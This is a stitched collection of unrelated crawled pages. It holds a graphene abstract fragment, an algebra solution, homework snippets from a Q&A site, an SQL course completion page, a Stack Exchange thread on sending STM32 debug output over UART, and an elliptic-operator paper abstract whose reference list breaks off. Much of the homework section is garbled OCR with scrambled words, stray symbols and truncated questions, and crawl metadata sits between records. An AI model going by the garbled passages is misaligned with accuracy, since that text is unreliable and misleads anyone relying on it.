for faster C migration from the Cu surface to the graphene-Cu interface sites across the graphene edge. These findings allow us to propose a novel alternating growth scheme to realize mass production of bilayer graphene. | 2022-09-29 10:14:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6336075663566589, "perplexity": 3805.171464910501}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00606.warc.gz"} |
https://www.gradesaver.com/textbooks/math/geometry/geometry-common-core-15th-edition/skills-handbook-evaluating-and-simplifying-expressions-exercises-page-890/24 | ## Geometry: Common Core (15th Edition)
$r^2-2r+1$
We start with the given expression: $(r-1)^2$ To simplify an algebraic expression, we must eliminate any parentheses and combine like terms. We expand the squared term:$(r-1)(r-1)$ We apply the distributive property to multiply the binomials: $r^2-r-r+1$ We combine the like terms by subtracting: $r^2-2r+1$ | 2022-08-14 04:15:40 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6308560967445374, "perplexity": 866.3431709202509}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571993.68/warc/CC-MAIN-20220814022847-20220814052847-00323.warc.gz"} |
https://solvedlib.com/check-my-work-the-fact-that-generally-accepted,436854 | # Check my work The fact that generally accepted accounting principles allow companies flexibility in choosing between...
##### In a study of concrete curing improvement process for prestressed beams, the following data were collected to determine the effect of curing time and temperature on the compression strength of the concrete The equation is AS M,(Time 48 ) M ( Temperature 25) Here are the data From these data_ do the following:Plot the data as you see fit Determine the regression coefficients using Data/Data Analysis/Regression in Excel (see note on using Excel for regression analysis) The standard deviation of th
In a study of concrete curing improvement process for prestressed beams, the following data were collected to determine the effect of curing time and temperature on the compression strength of the concrete The equation is AS M,(Time 48 ) M ( Temperature 25) Here are the data From these data_ do the ...
##### Question 59 of 70According to the Kinetic Molecular TheoryA) The volume of the gas particles will impact the volume available to the gas.B) Gas particles exert pressure by colliding with one anotherC) The gas particles are moving in circular motions throughout the container:D) The average kinetic energy proportional to the temperature of the system:
Question 59 of 70 According to the Kinetic Molecular Theory A) The volume of the gas particles will impact the volume available to the gas. B) Gas particles exert pressure by colliding with one another C) The gas particles are moving in circular motions throughout the container: D) The average kinet...
##### CASE 2 CASHFLOW ANALYSIS As at Dec 31, 2017 and 2010 Liabilities and Shareholders' Equity 25....
CASE 2 CASHFLOW ANALYSIS As at Dec 31, 2017 and 2010 Liabilities and Shareholders' Equity 25. ONOD A ccred liabilities 14 $600 22.000 10.000 10,000 1.000 3.000 5200D te payable 10,000 Tonds pa 10.000 - 53,000 67.000 ++.000 10.000 Share capital 426D 15.000 10.000 Total buities and Total assets$...
##### Rrel [uwel huna clcthesline lu diy uuLs de lsses mcisture a a rate rnntent (Round "Dir answar dafimai nincer o4lionaMslure ccnteniIrtlunelulicinal muis-Mie cunleml AteLhe ISriel liaveul ils muis-ulenjurs Trt M10
Rrel [uwel huna clcthesline lu diy uuLs de lsses mcisture a a rate rnntent (Round "Dir answar dafimai nincer o4liona Mslure ccnteni Irt lunel ulicinal muis-Mie cunleml Ate Lhe ISriel liave ul ils muis-ule njurs Trt M10...
##### 6t and [B(t)]= find j[A()I[B()]as . 4tGiven [A(t)]= t+1
6t and [B(t)]= find j[A()I[B()]as . 4t Given [A(t)]= t+1...
##### What is nuclear fusion?
What is nuclear fusion?...
##### ] ] Ii 1 il 4 % J 1 1 2 1 1 V 8 1 1 2 2 L 3 7 V 28
] ] Ii 1 il 4 % J 1 1 2 1 1 V 8 1 1 2 2 L 3 7 V 28...
##### (a) Find the torques about a fixed axis through O due to each of the applied...
(a) Find the torques about a fixed axis through O due to each of the applied forces shown in the figure to the right (stolen from the internet). (b) Find the angular acceleration of the bar if it is uniform and has a mass of 250 grams....
##### Expenmental psychologist hypothesizes thar eople cf ersonality type 4 scorc highet than people of personalty typc C on intelhgcnce test Thc Sprgrce tumcd ourtobc 81. whilc the mcan score of type 4 people was 31.62 &nd themean Scon fortype C people was 33.14 What i: scorc? '2(31.62-33 14) / 81 8 {7(31,62-33.14)( 90) 41.69 9 (31.62-33.14V.812 = -2 32 {F(31.62-33 14V[()( 81)]
expenmental psychologist hypothesizes thar eople cf ersonality type 4 scorc highet than people of personalty typc C on intelhgcnce test Thc Sprgrce tumcd ourtobc 81. whilc the mcan score of type 4 people was 31.62 &nd themean Scon fortype C people was 33.14 What i: scorc? '2(31.62-33 14) / ...
##### Habun Inul tna ticnping diblarcn eiopcno diblanceYnnn KnctbqudiuapucdIravuli 20 nuteInutiingHananIinavun baveine Intab puhou (Iypo ntge daclmielobrung dialanea
Habun Inul tna ticnping diblarcn eiopcno diblance Ynnn Knct bqudiu apucd Iravuli 20 nute Inutiing Hanan Iinavun baveine Intab puhou (Iypo ntge daclmi elobrung dialanea...
##### 2 3 Optibn 32 8 9 4 3 5 J3 W 2 3 2 88 2 8 74 3
2 3 Optibn 32 8 9 4 3 5 J3 W 2 3 2 88 2 8 74 3...
##### Crane Company sells one product. Presented below is information for January for Crane Company. Nov. 1...
Crane Company sells one product. Presented below is information for January for Crane Company. Nov. 1 Inventory 300 units at $12 each 5 Purchase 190 units at$13 each 10 Sale 430 units at $20 each 15 Purchase 430 units at$12.50 each 21 Sale 440 units at $21 each 30 Purchase 350 units at$12.80 each...
##### 21. Answer ALL parts of this question. The anti-inflammatory agent, (S)-naproxen sodium salt has a specific...
21. Answer ALL parts of this question. The anti-inflammatory agent, (S)-naproxen sodium salt has a specific rotation of +66º. The commercial preparation of the latter agent results in a mixture that has a 97% enantiomeric excess (ee). colo H3C0 (S)-naproxen sodium salt (a) Draw the R enantiomer...
##### Probability & Statistics (25 points) 1. (5 points) If the probability that student A will fail...
Probability & Statistics (25 points) 1. (5 points) If the probability that student A will fail a certain statistics examination is 0.3, the probability that student B will fail the examination is 0.2, and the probability that bosh student A and student B will fail the examination is 0.1. a) What...
##### How do you evaluate \frac { 12- 3y } { 2} + v \frac { 2y - 4} { y } for y=3?
How do you evaluate \frac { 12- 3y } { 2} + v \frac { 2y - 4} { y } for y=3?...
##### A researcher finds that the mean value of depression = 15, and the variance = 9. Which Depression Score corresponds to a...
A researcher finds that the mean value of depression = 15, and the variance = 9. Which Depression Score corresponds to a z-score of +1?...
##### How do you write the equation log_3 81=4 in exponential form?
How do you write the equation log_3 81=4 in exponential form?...
##### Find the dumensions of = rcctangular with a perimctc of 400 fect; wbosc alea i5 naxua (10 polnts)
Find the dumensions of = rcctangular with a perimctc of 400 fect; wbosc alea i5 naxua (10 polnts)...
##### Please answer all of them. Thank you!3.Being able to “see hot air†rising from a hot surfaceis due to (a) dispersion, (b) diffuse reflection, (c)refraction, (d) internal reflection.4.The critical angle for a water air interface is about480. Light will be transmitted from the water for an angle ofincidence of (a) 600, (b) 520, (c) 480, (d) 440. 5.A reverse in the direction of a wave due to aboundary is called (a) refraction, (b) interference,(c) reflection, (d) polarization. 6.A change
Please answer all of them. Thank you! 3.Being able to “see hot air†rising from a hot surface is due to (a) dispersion, (b) diffuse reflection, (c) refraction, (d) internal reflection. 4.The critical angle for a water air interface is about 480. Light will be transmitted from the wate...
##### HF L VEE?7 V F H 2] F 0 58 1 L H 1 1 E : L { t JE U H HF { H 3 8 1 N 1 1 ; 1 : ; W 1 L 1 [ [ 3 1 0 3 W 1 I H 0 1 1 3 1 1 WHHH 1 IN 3 V ; 1 II V Iml IV 18 { H H I W 1 L VHH 2 1 2 } 4 IH 1 { [ 3 1] { 1 { N 1 5 2 TE 1 0 1 1 ] L 1 2 F 7 2 1 6 3 ! 1 1 3
HF L VEE?7 V F H 2] F 0 58 1 L H 1 1 E : L { t JE U H HF { H 3 8 1 N 1 1 ; 1 : ; W 1 L 1 [ [ 3 1 0 3 W 1 I H 0 1 1 3 1 1 WHHH 1 IN 3 V ; 1 II V Iml IV 18 { H H I W 1 L VHH 2 1 2 } 4 IH 1 { [ 3 1] { 1 { N 1 5 2 TE 1 0 1 1 ] L 1 2 F 7 2 1 6 3 ! 1 1 3...
##### Give thc value Give conclusion for thc hypothesis Interva Find 959 conlidance confidence Interval Write conclusion for theTwo Means carpeted rooms In hospitals contained more bacteria than Researchers wanted t0 check bacterla In aroom researchers pumped the air determine the umount uncarpeted rooms and eight uncarpeted rooms: Colonies of Petri dish for eight carpeted from the room over to form in the 16 Petri dishes. The results are presented in the table bacteria were allowed (Measured as bac
Give thc value Give conclusion for thc hypothesis Interva Find 959 conlidance confidence Interval Write conclusion for the Two Means carpeted rooms In hospitals contained more bacteria than Researchers wanted t0 check bacterla In aroom researchers pumped the air determine the umount uncarpeted room...
##### Draw the major nitrogen-contaC [Review Topicsl [Referencesl Drcooh Google Search mentftakeCovalentActivity do?locatorzassignment-take&takeAssignmentSessionLocator-assignment-take[Review Topice][References] Draw the major nitrogen-containing organic product(s) of the reaction shownAsNCHCNHCHCNHCHCOz 6N HCI 110 'C CHzOH CH3 CH(CH3hzDraw only the product(s) containing nitrogen Draw products in the ionic forms obtained under the reaction conditions Do not include counter-ions e.g-, Na mn yo
Draw the major nitrogen-conta C [Review Topicsl [Referencesl Dr cooh Google Search mentftakeCovalentActivity do?locatorzassignment-take&takeAssignmentSessionLocator-assignment-take [Review Topice] [References] Draw the major nitrogen-containing organic product(s) of the reaction shown AsNCHCNHCH...
##### Ialues] ell BlConsider the curve IA Find the point(s) where the Hangent line is horizontal]and findithe point(s) where the tangent line is vertical
Ialues] ell BlConsider the curve IA Find the point(s) where the Hangent line is horizontal]and findithe point(s) where the tangent line is vertical...
##### Doter Detutm 1 1 1 end ol an 1 1 advertising IH V 1 reach chullaulu uccoiding [0 Lsi000"
Doter Detutm 1 1 1 end ol an 1 1 advertising IH V 1 reach chullaulu uccoiding [0 L si000"...
##### 8. Given F() = < In L Vi , e > a). Find the domain of 7() _ 0 1t -/b) Find If()|l:Li~Find 7"%).d) Find (v(o)asPlnd Imro)
8. Given F() = < In L Vi , e > a). Find the domain of 7() _ 0 1t -/ b) Find If()|l: Li~ Find 7"%). d) Find (v(o)as Plnd Imro)...
##### 10 Question (1 point)Ist attemptJhl See Periodic TableScc HinThe reaction0f 5.60 Rol c carbon with excess Oz yields 9.75 gof COz What fs the percent yleld of this reaction?
10 Question (1 point) Ist attempt Jhl See Periodic Table Scc Hin The reaction0f 5.60 Rol c carbon with excess Oz yields 9.75 gof COz What fs the percent yleld of this reaction?...
##### Hardness is "commcy" measured by: Rockwell Test Brinell Test Vickers Test Both a & b O...
Hardness is "commcy" measured by: Rockwell Test Brinell Test Vickers Test Both a & b O a, b, &c Alloys of nickel are commercially important and are mainly noted for ______ and ductility and being a noble metal. high thermal conductivity, high electrical conductivity. O corrosion resi...
##### Part 0Complete the fourlh row of the table_ Express your answer using two signlticant liguresAEdX-10"M+ASubmltProvious Anewon Requost AnsworIncorrect; Try Agaln; 5 attempte remalning
Part 0 Complete the fourlh row of the table_ Express your answer using two signlticant ligures AEd X-10" M+A Submlt Provious Anewon Requost Answor Incorrect; Try Agaln; 5 attempte remalning...
##### Suppose that in Exercise 61 , instead of $f(x)=\cos x,$ we use $g(x)=\sin x(0 \leq x \leq 1)$ for the growth function. (a) Complete a table similar to the one in Exercise $61(b)$ (assuming $x_{0}=50$ ). (b) What do you think would be the long-term behavior of this population?
Suppose that in Exercise 61 , instead of $f(x)=\cos x,$ we use $g(x)=\sin x(0 \leq x \leq 1)$ for the growth function. (a) Complete a table similar to the one in Exercise $61(b)$ (assuming $x_{0}=50$ ). (b) What do you think would be the long-term behavior of this population?... | 2022-09-29 08:40:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6787225008010864, "perplexity": 8017.972487282493}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00128.warc.gz"} |
https://academy.vertabelo.com/course/common-table-expressions/final-quiz/summary/congratulations | Save up to $499! Grab all Python courses for$49 or all online courses we’ve ever launched for only \$169. Only Feb 11-16. Happy Valentine's!
Introduction
Quiz
Summary
14. Congratulations
## Instruction
Perfect! That was the last exercise in our quiz and you've done pretty well!
This is where our course ends. We've done quite a lot: single CTEs, multiple CTEs, nested CTEs, recursion, INSERT/UPDATE/DELETE with CTEs… pretty much everything you need in order to successfully use Common Table Expressions. We hope the knowledge you have gained will prove useful to you.
If you enjoyed the course, please leave us a rating and take a look at other courses we offer. Thank you for studying with Vertabelo Academy!
## Exercise
Press to finish the course. | 2019-02-16 09:35:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1989753246307373, "perplexity": 3430.941156461766}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247480240.25/warc/CC-MAIN-20190216085312-20190216111312-00610.warc.gz"} |
https://electronics.stackexchange.com/questions/341231/stm32-print-via-uart-without-nucleo-discovery/454890 | STM32 print via UART without Nucleo/Discovery
I would like for debugging/trace purposes to print texts (preferably via printf but just text is also fine) from an STM32F103C8T6 to a (PC) terminal application.
I noticed that all examples use a Nucleo or Discovery board but I don't have those. I'm using ST Link/V2 and System Workbench (Eclipse).
Does anybody know how to do this or if it is even possible? (I guess so with some USB/RS232 converter maybe).
• You can print the string on any UART lines and use a UART to USB converter to see it on PC terminal. Because a Nucleo/Discovery has a onboard UART/USB converter which does exactly the same thing. – ammar.cma Nov 22 '17 at 10:25
• Check this tool: st.com/en/development-tools/stm-studio-stm32.html A bit better than sending strings. – Bence Kaulics Nov 22 '17 at 11:30
• @BenceKaulics If it works together with Eclipse than it would be very useful. – Michel Keijzers Nov 22 '17 at 11:41
• It is not a plugin but a completely independent tool. – Bence Kaulics Nov 22 '17 at 12:17
• @BenceKaulics I know ... but I cannot e.g. use ST Link Utility together (simulatenously) with Eclipse, probably with that tool I have the same problem. – Michel Keijzers Nov 22 '17 at 12:18
All the STM32F0 that I can think of come with UART hardware – meaning that you just need to write your string to some address, and trigger the transfer.
The knowledge of how to do that can be taken from the Reference Manual of that family (ST Document number RM0008), or just straight from the UART driver within the STM Cube software package.
Electrically, you'll really get a TTL UART – any TTL serial-to-USB converter will do. The Nucleo boards just contain a second microcontroller that plays a USB-to-STLink and USB-to-TTL-UART bridge.
For "easy" debugging, the UART is certainly the least error-prone communications interface in the chip. If you're tempted to directly communicate with the PC: Your MCU comes with a USB2 transceiver. You can, adding a few resistors, directly connect that to your PC, and let it look like a serial adapter itself, just giving you your messages or data! That is, given you have a firmware that handles the USB stack. ST offers a library to do that, and that comes with examples. Be warned though that USB is way more complicated than UART, and if you just want to occasionally print short strings, UART certainly is sufficient. The USB interface allows you to send USB data packets through USB2 Full Speed (that's the 12Mb/s standard) – that can be hell of an advantage if you need e.g. to build something that samples a signal rapidly (that's why I used USB on an ARM the first time) in the long term.
• Thanks for the answer ... I just need some data (I doubt I need 12 MB/s, at least not for now)... I will check further into the TTL serial to USB converter ... will my PC automatically detect it as a com port or should I install a driver to have it visible in a terminal application? – Michel Keijzers Nov 22 '17 at 10:31
• Windows generally comes with drivers installed because this has been around for a while. Use HyperTerminal or PuTTY to open the COM port on the baud rate you set in firmware and you should be able to see the ASCII characters. – ammar.cma Nov 22 '17 at 10:33
• @ammar.cma Thanks ... also I found this learn.sparkfun.com/tutorials/how-to-install-ftdi-drivers/all to install ftdi drivers, so even in case it is not autoamtically I can try that. – Michel Keijzers Nov 22 '17 at 10:34
• @MichelKeijzers It depends on the TTL/USB adapter you get and which chip it uses inside. FTDI is common, but cheap knockoffs come from different vendors and thus different drivers. Although, you shouldn't have a problem with drivers. (tons of online tutorials for that) – ammar.cma Nov 22 '17 at 10:36
• @ammar.cma I have a cheap knockoff probably ... but I will check if it works (when I have time)... it's a 'hobby' project getting out of hand a bit :-) ... but a good way to learn about microprocessors. – Michel Keijzers Nov 22 '17 at 10:49
There is no problem with it. You have few options. The first way is to configure your UART (the process may be very straightforward if you use CubeMX) to send text and then hook-up RX and GND pins of your USB-RS232 to TX and GND pins of your board respectively. Then you can transmit your logs for example with function HAL_Uart_Transmit(). More advanced option is to redirect stdout to that UART. But it will take a lot of effort to configure and run this.
There is a third way to solve your problem and it is called semihosting. I have a very tiny experience with it and I cant recommend using it. A semihosted event halts the MCU and needs support from the debug tools to handle the semihosted operation and without debug tools attached, a semihosted event will permanently halt the MCU.
• I will try the first mechanism ... the SWO seems good, but it's not nice to have not simultaneously an IDE open (I need to upload very often). And it's for a hobby project, probably Keil is too expensive to buy just for some hobby. The last sounds interesting too, although I'm afraid it will affect my real program which I want to debug (using interrupts via DMA). – Michel Keijzers Nov 22 '17 at 11:04
• @MichelKeijzers keil have free evaluational licenses with 32kb code limit. If your app is less than that, you can give it a try. Believe me: with SWO you can achieve your result much faster, than with any other way. Besides there are still some ways to make it work with System Workbench. – Vadimchik Nov 22 '17 at 11:15
• Currently I use only 15 KB, but I'm sure eventually I will use more. I'm using now a STM32F103C8T6 which has 64 KB, but eventually I use a 512 KB version, and I think I will need at least a few hundred (not sure yet though). But for 'hardware tests' I can use the prints in a smaller footprint. I will also check the 'some ways' link, thank you – Michel Keijzers Nov 22 '17 at 11:26
• @MichelKeijzers You can use ITM with the IDE still open and connected. In fact that's how I used it the first time I used STM32. I did not know that you could read printfs over debug interface. I was surprised to see printf output when I had neither connected the USB port nor the UART on the MCU to my computer. You can use breakpoints etc. also. Point is it does not interfere with the way you'd normally use your IDE and Debugger. – Dojo Feb 22 '18 at 16:28
• @MichelKeijzers I had tried this in AC6 System Workbench. Just got a mailer form ST that True Studio Pro is now free! Got to try it! – Dojo Feb 22 '18 at 17:28
The procedure is pretty much the same as with a Nucleo board. As was later pointed out to me, the specifics will be different on different STM32 chips, but here's what I used (on an STM32WB55). I assume your job will be similar at a high-level, but the details of the specific API calls may be different.
Also note that if you use CubeMX to assign and configure the UART, then code for steps 1 and 2 should be auto-generated, allowing you to skip to step 3.
1. Configure the GPIO pins used by the UART (in the STM HAL environment, implement the function HAL_UART_MspInit. The HAL library will call it when you are ready to initialize the UART.
• Make sure you select pins that have UART/USART capability on your chip. Look for your chip's ...hal_gpio_ex.h header (e.g. st32wbxx_hal_gpio_ex.h) to see the table of GPIO pins and alternate functions. In my case, I'm using PB6 (USART1_TX) and PB7 (USART1_RX), which are the ones used by the ST-Link interface on my Nucleo board. Your chip may have different options available.
• Enable the appropriate clocks for the device and GPIO pins you're using (e.g. USART1 and GPIOB in my case)
• Initialize the GPIO pins. Mode should be is AF_PP. I set pull to PULLUP. Set the alternate mode as appropriate for your chip (see above. In my case AF7_USART1).
2. Initialize the appropriate UART via a call to HAL_UART_Init. The parameters I use (on an STM32WB55) are:
• Instance = USART1 (use whatever you chose above when configuring the GPIOs)
• Init.BaudRate = 115200
• Init.WordLength = UART_WORDLENGTH_8B. Note that this length includes any parity. So if you use parity, set this to _9B (or configure your terminal for 7-bit words).
• Init.StopBits = UART_STOPBITS_1
• Init.Parity = UART_PARITY_NONE
• Init.Mode = UART_MODE_TX_RX (you could use just _TX, if you're never going to read from the UART)
• Init.HwFlowCtl = UART_HWCONTROL_NONE. I haven't seen a need for CTS/RTS when using a USB connection to a terminal emulator on a PC. But you may need it for your application. If you do, be sure to wire and configure the corresponding GPIO pins.
• Init.OverSampling = UART_OVERSAMPLING_16. I'm not sure what this does. This is what ST's sample code uses
• Init.OneBitSampling = UART_ONE_BIT_SAMPLE_DISABLE. Not sure about this either. ST's sample code uses this.
• Init.ClockPrescaler = UART_PRESCALER_DIV1. Not sure why you might want a different prescaler. Maybe to run at lower power or when your baudrate is much lower than your clock (e.g. 115200 bps with a 64 MHz clock)
• AdvancedInit.AdvFeatureInit = UART_ADVFEATURE_NO_INIT. Unless you want to use one of the advanced features (auto baud detect looks like it might be useful)
With this in place, you can call HAL_UART_Transmit to send bytes over the UART. If you want to link it up to printf, there's a bit more to go.
1. Add a "syscalls.c" file to your project, if you don't already have one. Copy it from one of ST's sample programs. The CubeMX tool, if you use it, should generate one for you. This will provide most of the glue for stdout
2. Implement the function int __io_putchar(int c). This is called repeatedly by code in syscalls for writing characters to your console. Your implementation should call HAL_UART_Transmit to send the character to the UART. Be sure to return the character that was written to the UART as well
Of course, after doing this, be sure to attach something (like your ST Link) to your configured GPIO UART pins (minimum TX and RX. CTS and RTS if you're using hardware flow control) so you can connect them to a PC.
• Beware in getting so deep into the hardware configuration detail that this is substantially different between STM32 subfamilies, and specifically what you describe for the will not match the STM32F103 mentioned in the question. – Chris Stratton Aug 30 at 13:20
• What doesn't match? I wrote that the particular GPIO pins used will be different. Are the HAL functions incompatible across products? That pretty much undermines the point of having a HAL. – David C. Aug 30 at 14:59
• Most except for the actual line coding and perhaps the oversampling mismatches; in practice an MCU HAL like this doesn't really abstract hardware unique details, it just names them, and the hardware itself is notably different between the chip you are familiar with and the one the question is about. – Chris Stratton Aug 30 at 15:24 | 2019-10-14 23:04:50 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.33866652846336365, "perplexity": 2642.989157747721}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986655554.2/warc/CC-MAIN-20191014223147-20191015010647-00096.warc.gz"} |
https://www.aimsciences.org/article/doi/10.3934/cpaa.2016040 | # American Institute of Mathematical Sciences
• Previous Article
Delta shocks and vacuum states in vanishing pressure limits of solutions to the relativistic Euler equations for generalized Chaplygin gas
• CPAA Home
• This Issue
• Next Article
Steady state solutions of ferrofluid flow models
November 2016, 15(6): 2357-2372. doi: 10.3934/cpaa.2016040
## Elliptic operators with unbounded diffusion coefficients perturbed by inverse square potentials in $L^p$--spaces
1 Università degli Studi di Pavia, Dipartimento di Matematica “F. Casorati”, via Ferrata 1, 27100 Pavia 2 Dipartimento di Fisica, Universitá degli Studi di Salerno, via Giovanni Paolo II, 132, 84084, Fisciano (Sa), Italy 3 Dipartimento di Ingegneria dell'Informazione e Matematica Applicata, Università degli Studi di Salerno, Via Ponte Don Melillo, 84084 Fisciano (Sa)
Received March 2016 Revised June 2016 Published September 2016
In this paper we give sufficient conditions on $\alpha \ge 0$ and $c\in R$ ensuring that the space of test functions $C_c^\infty(R^N)$ is a core for the operator \begin{eqnarray} L_0u=(1+|x|^\alpha )\Delta u+\frac{c}{|x|^2}u=:Lu+\frac{c}{|x|^2}u, \end{eqnarray} and $L_0$ with a suitable domain generates a quasi-contractive and positivity preserving $C_0$-semigroup in $L^p(R^N), 1 < p < \infty$. The proofs are based on some $L^p$-weighted Hardy's inequality and perturbation techniques.
Citation: Simona Fornaro, Federica Gregorio, Abdelaziz Rhandi. Elliptic operators with unbounded diffusion coefficients perturbed by inverse square potentials in $L^p$--spaces. Communications on Pure & Applied Analysis, 2016, 15 (6) : 2357-2372. doi: 10.3934/cpaa.2016040
##### References:
[1] A. Canale, A. Rhandi and C. Tacelli, Schrödinger type operators with unbounded diffusion and potential terms,, \emph{Ann. Scuola Norm. Sup. Pisa Cl. Sci.}, (). Google Scholar [2] P. Baras and J. A. Goldstein, The heat equation with a singular potential,, \emph{Trans. Am. Math. Soc.}, 284 (1984), 121. doi: 10.2307/1999277. Google Scholar [3] T. Durante and A. Rhandi, On the essential self-adjointness of Ornstein-Uhlenbeck operators perturbed by inverse-square potentials,, \emph{Discrete Cont. Dyn. Syst. S.}, 6 (2013), 649. Google Scholar [4] D. E. Edmunds and W. E. Evans, Spectral Theory and Differential Operators,, Clarendon Press, (1987). Google Scholar [5] K. J. Engel and R. Nagel, One-Parameter Semigroups for Linear Evolution Equations,, Springer-Verlag, (2000). Google Scholar [6] S. Fornaro and L. Lorenzi, Generation results for elliptic operators with unbounded diffusion coefficients in $L^p$- and $C_b$-spaces,, \emph{Discrete Contin. Dyn. Syst.}, 18 (2007), 747. doi: 10.3934/dcds.2007.18.747. Google Scholar [7] S. Fornaro and A. Rhandi, On the Ornstein Uhlenbeck operator perturbed by singular potentials in $L^p$-spaces,, \emph{Discrete Contin. Dyn. Syst.}, 33 (2013), 5049. Google Scholar [8] D. Gilbarg and N. Trudinger, Elliptic Partial Differential Equations of Second Order,, Springer, (1983). doi: 10.1007/978-3-642-61798-0. Google Scholar [9] L. Lorenzi and A. Rhandi, On Schrödinger type operators with unbounded coefficients: generation and heat kernel estimates,, \emph{J. Evol. Equ.}, 15 (2015), 53. doi: 10.1007/s00028-014-0249-z. Google Scholar [10] G. Metafune and C. Spina, An integration by parts formula in Sobolev spaces,, \emph{Mediterranean Journal of Mathematics}, 5 (2008), 357. doi: 10.1007/s00009-008-0155-0. Google Scholar [11] G. Metafune and C. Spina, Elliptic operators with unbounded diffusion coefficients in $L^p$ spaces,, \emph{Ann. Scuola Norm. Sup. Pisa Cl. Sci.}, XI (2012), 303. Google Scholar [12] G. Metafune, N. Okazawa, M. Sobajima and C. Spina, Scale invariant elliptic operators with singular coefficients,, \emph{J. Evol. Equ.}, 16 (2016), 391. doi: 10.1007/s00028-015-0307-1. Google Scholar [13] E. Mitidieri, A simple approach to Hardy inequalities,, \emph{Mat. Zametki}, 67 (2000), 563. doi: 10.1007/BF02676404. Google Scholar [14] R. Nagel (ed.), One-Parameter Semigroups of Positive Operators,, Lecture Notes in Math. \textbf{1184}, 1184 (1986). doi: 10.1007/BFb0074922. Google Scholar [15] N. Okazawa, On the perturbation of linear operators in Banach and Hilbert spaces,, \emph{J. Math. Soc. Japan}, 34 (1982), 677. doi: 10.2969/jmsj/03440677. Google Scholar [16] N. Okazawa, $L^p$-theory of Schrödinger operators with strongly singular potentials,, \emph{Japan. J. Math.}, 22 (1996), 199. Google Scholar [17] E. M. Ouhabaz, Analysis of Heat Equations on Domains,, London Math. Soc. Monographs \textbf{31}, 31 (2004). Google Scholar [18] M. Reed and B. Simon, Methods of Modern Mathematical Physics II: Fourier Analysis, Self-Adjointness,, Academic Press, (1975). Google Scholar [19] B. Simon, 